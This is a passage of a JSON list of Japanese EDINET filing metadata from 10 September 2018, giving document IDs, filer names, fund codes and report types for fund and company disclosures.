"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 85,
"docID": "S100E2SV",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G04914",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:24",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 86,
"docID": "S100E045",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01293",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:24",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFDQ",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 87,
"docID": "S100DYLC",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11002",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:24",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第28期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 88,
"docID": "S100DMAE",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11919",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:25",
"docDescription": "半期報告書(内国投資信託受益証券)-第4期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 89,
"docID": "S100DYLD",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11002",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:25",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 90,
"docID": "S100E04B",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01294",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:26",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 91,
"docID": "S100E04D",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01294",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:28",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFDC",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 92,
"docID": "S100E049",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10995",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:28",
"docDescription": "半期報告書(内国投資信託受益証券)-第5期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 93,
"docID": "S100E062",
"edinetCode": "E12566",
"secCode": null,
"JCN": "2010001066780",
"filerName": "イーストスプリング・インベストメンツ株式会社",
"fundCode": "G09277",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:28",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 94,
"docID": "S100E1F4",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01379",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:29",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 95,
"docID": "S100E04F",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10995",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:29",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CGEH",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 96,
"docID": "S100E2SW",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G07654",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:29",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 97,
"docID": "S100E1F5",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G05027",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:30",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 98,
"docID": "S100DXXS",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G03129",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:31",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第17期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 99,
"docID": "S100E1F7",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G05146",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:31",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 100,
"docID": "S100E04M",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01296",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:31",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 101,
"docID": "S100E1F8",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G08852",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:31",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 102,
"docID": "S100E2SY",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G10291",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:32",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 103,
"docID": "S100E04O",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01296",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:32",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFE9",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 104,
"docID": "S100E1F9",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10990",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:32",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 105,
"docID": "S100DXXV",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G03129",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:33",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 106,
"docID": "S100DMAC",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11919",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:33",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 107,
"docID": "S100E2QU",
"edinetCode": "E04803",
"secCode": "97420",
"JCN": "2020001030067",
"filerName": "株式会社アイネス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:33",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 108,
"docID": "S100E1FA",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10992",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:33",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 109,
"docID": "S100E1XE",
"edinetCode": "E12425",
"secCode": null,
"JCN": "5010001048652",
"filerName": "レッグ・メイソン・アセット・マネジメント株式会社",
"fundCode": "G12779",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:34",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 110,
"docID": "S100E1FD",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11008",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:34",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 111,
"docID": "S100E1FE",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11056",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:35",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 112,
"docID": "S100E1FF",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11061",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:36",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 113,
"docID": "S100E2YY",
"edinetCode": "E00820",
"secCode": "42040",
"JCN": "1120001059650",
"filerName": "積水化学工業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:36",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 114,
"docID": "S100E1FG",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11068",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:37",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 115,
"docID": "S100E1FI",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11071",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:37",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 116,
"docID": "S100DYWA",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G05468",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:38",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第22期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 117,
"docID": "S100DY70",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12401",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:38",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第3期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 118,
"docID": "S100E1FK",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11072",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:38",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 119,
"docID": "S100E2Z3",
"edinetCode": "E03945",
"secCode": "88500",
"JCN": "9010001095583",
"filerName": "スターツコーポレーション株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:38",
"docDescription": "変更報告書",
"issuerEdinetCode": "E14223",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 120,
"docID": "S100DNW0",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11824",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:39",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第17期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 121,
"docID": "S100E1FL",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11073",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:39",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 122,
"docID": "S100DYWB",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G05468",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 123,
"docID": "S100E1FN",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11080",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
